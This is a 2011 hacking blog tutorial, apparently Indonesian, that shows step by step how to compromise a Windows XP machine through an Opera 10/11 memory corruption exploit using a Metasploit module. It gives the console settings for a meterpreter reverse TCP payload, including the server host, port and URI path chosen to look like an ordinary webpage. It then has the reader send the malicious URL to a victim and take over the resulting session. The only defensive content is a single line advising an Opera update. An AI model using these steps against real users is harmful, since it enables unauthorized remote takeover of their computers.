,
Headlines News :
Home » » Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend )

Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend )

Written By Nanda Journey on Minggu, 20 November 2011 | 14.39


Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Vulnerable Application : Opera 10 | 11

Exploit Credit : Jose A. Vazquez

After hibernating a few weeks for a trip to cities in China, now it's time to continue our easy tutorial about hacking. Today in this tutorial was talking about how to hack Windows via Opera(v10/11) memory corruption by using metasploit framework.

Requirement :

1. Metasploit Framework
2. Opera.rb(credits to Jose A. Vazquez) metasploit exploit module(press CTRL + click my affiliations box to view download link below)

Step By Step :

1. Update your metasploit framework by using msfupdate command, or download the opera.rb file above and copy into
/pentest/exploits/framework/modules/exploit/remote/
2. Run your metasploit framework using msfconsole command and then use the exploit we've already copied in step 1. For payload we will use meterpreter reverse TCP. (see picture below)
Hacking Windows via Opera 10/11 Memory Corruption
3. When finished set up the exploit and payload, we need to determine the available switches from this exploit. To list all available switches, just run show options command.
Hacking Windows via Opera 10/11 Memory Corruption
Info :

set srvhost 192.168.8.93 --> set up the exploit server address which is our local ip address

set srvport 80 --> make it looks like accessing a webpage

set uripath opera --> you can change to something interesting URL (http://192.168.8.93/URIPATH)

set lhost 192.168.8.93 --> IP address to handle the payload if exploit successfully performed

set lport 443 --> attacker local port to handle the payload
4. After everything has been set up correctly, now it's time to run the exploit server by using exploit command and then send the given URL to victim.
Hacking Windows via Opera 10/11 Memory Corruption
5. After victim opened our malicious URL, our metasploit console will show that we have a new available sessions available to connect to the victim machine.
Hacking Windows via Opera 10/11 Memory Corruption
6. To interract with the active sessions, run sessions -i 1 that means we want to interract with sessions ID no 1.
Hacking Windows via Opera 10/11 Memory Corruption
Pwned!

Countermeasures :

1. Update to the latest Opera version
Hope it's useful :-)
nb : click the grey area of my affiliations box to view the download link
Anda sedang membaca artikel tentang Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend ) dan anda bisa menemukan artikel Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend ) ini dengan url http://hy-hack.blogspot.com/2011/11/hacking-windows-via-opera-1011-memory.html,Dilarang menduplikat artikel ini Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend ) jika sangat bermanfaat hanya boleh sebagai artikel refrensi atau harus mengulas nya dengan bahasa / kalimat yang berbeda dan memberi link ini : Hacking Windows via Opera 10/11 Memory Corruption ( by heykhend )


Artikel Terkait:

Share this post :

Poskan Komentar

Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik

 
Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)